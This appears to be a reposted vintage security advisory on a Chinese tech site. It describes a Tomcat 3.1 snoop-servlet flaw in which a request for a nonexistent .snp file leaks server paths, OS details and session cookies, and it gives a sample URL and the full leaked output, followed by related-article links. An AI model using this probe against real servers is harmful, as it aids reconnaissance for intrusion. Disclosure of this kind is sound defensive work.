Apache Tomcat 重要信息暴露漏洞
bugtraq id 1532class Design Error
cve GENERIC-MAP-NOMATCH
remote Yes
local No
published July 20, 2000
updated August 02, 2000
vulnerable Apache Group Tomcat 3.1
- Sun Solaris 8.0
- Sun Solaris 7.0
- SGI IRIX 6.5
- SGI IRIX 6.4
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- MandrakeSoft Linux Mandrake 7.1
- MandrakeSoft Linux Mandrake 7.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- Digital UNIX 4.0
- Debian Linux 2.2
- Debian Linux 2.1
- Connectiva Linux 5.1
- Caldera OpenLinux 2.4
- BSDI BSD/OS 4.0
Apache Group Tomcat 3.0
A vulnerability exists in the snoop servlet portion of the Tomcat package, version 3.1, from the Apache Software Foundation. Upon hitting an nonexistent file with the .snp extension, too much information is presented by the server as part of the error message. This information may be useful to a would be attacker in conducting further attacks. This information includes full paths, OS information, and other information that may be sensitive.
http://narco.guerrilla.sucks.co:8080/examples/jsp/snp/anything.snp
====
Snoop Servlet
Servlet init parameters:
Context init parameters:
Context attributes:
javax.servlet.context.tempdir =
/appsrv2/jakarta-tomcat/work/localhost_8080%2Fexamples
sun.servlet.workdir =
/appsrv2/jakarta-tomcat/work/localhost_8080%2Fexamples
Request attributes:
Servlet Name: snoop
Protocol: HTTP/1.0
Scheme: http
Server Name: narco.goverment.sucks.co
Server Port: 8080
Server Info: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.1.8; AIX
4.2 POWER_RS; java.vendor=IBM Corporation)
Remote Addr: xxx.xxx.xxx.xxx
Remote Host: xxx.xxx.xxx.xxx
Character Encoding: null
Content Length: -1
Content Type: null
Locale: en
Default Response Buffer: 8192
Parameter names in this request:
Headers in this request:
Host: narco.goverment.sucks.co:8080
Accept-Encoding: gzip
Cookie: JSESSIONID=To1212mC7833304641226407At
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png,
*/*
Connection: Keep-Alive
Accept-Charset: iso-8859-1,*,utf-8
User-Agent: Mozilla/4.51 [en] (Winsucks; I)
Accept-Language: en
Cookies in this request:
JSESSIONID = To1212mC7833304641226407At
Request Is Secure: false
Auth Type: null
HTTP Method: GET
Remote User: null
Request URI: /examples/jsp/snp/anything.snp
Context Path: /examples
Servlet Path: /jsp/snp/anything.snp
Path Info: null
Path Trans: null
Query String: null
Requested Session Id: To1212mC7833304641226407At
Current Session Id: To1212mC7833304641226407At
Session Created Time: 964047263477
Session Last Accessed Time: 964047528749
Session Max Inactive Interval Seconds: 1800
Session values:
numguess = num.NumberGuessBean@6bfa9a1
↓相关文章:
- · Tomcat IIS HowTo:将Tomcat装入IIS全攻略
- · CORBA例子(转)————————我也不知道是什麽东东:-)
- · Resin服务器平台介绍
- · Sun Java Web服务器远程可执行命令漏洞
- · Apache+Servlet+jsp
- · windows环境下安装tomcat <修订版本>
- · EJB概述(下)
- · 一份 tomcat vs resin 的测试报告。。。
- · EJB内部资参2
- · EJB内部资参5
- · 安装 JRun
- · j2ee doc 翻译系列之二 (2 完)
- · 将 Microsoft 的 Internet Information Server 用作 Java servlet 引擎 二 (给学过ASP的朋友)
- · 转:第一部分:EJB 体系结构的历史和目标
- · 准备翻译j2ee的doc,不知道有没有意义,请大家讨论。先贴一个:配置指南
- · J2EE技术
- · redhat6.1+apache+tomcat安装指南-jsp使用 (转)
- · WebSphere快速入门(20)
- · WebSphere快速入门(22)
- · WebSphere快速入门(2)
- · WebSphere快速入门(4)
- · WebSphere快速入门(6)
- · WebSphere快速入门(8)
- · WebSphere快速入门(9)
- · WebSphere快速入门(11)
- · WebSphere快速入门(12)
- · WebSphere快速入门(14)
- · 第一部分:EJB 体系结构的历史和目标 (二)(转)
- · 第三部分:布署和使用 Enterprise JavaBeans 组件(二)(转)
- · weblogic6.0使用心得
- · win2000server下安装tomcat后,再安装apache有什么好处?
- · jboss有关配置的教程
- · 我把resin和iis结合起来以后,asp程序就不能用了,把源码都显示出来了?怎么解决
- · TOMCAT+IIS配置方法
- · j2ee技术简单介绍
- · WebSphere快速入门(16)
- · WebSphere快速入门(18)
- · Weblogic6.0上Connection Pool、DataSource的创建与使用
- · 经过几天的折腾,终于在win2000下把mysql和jsp配置好了,下面是我总结的一些经验!
- · Tomcat中文手册(2)_转
- · Sorry,我刚找到的:配置J2EE支持Mysql (转)
- · 分布式对话服务器的管理(1)
- · 分布式对话服务器的管理(3)
- · 分布式对话服务器的管理(5)
- · J2EE配置指南(1)

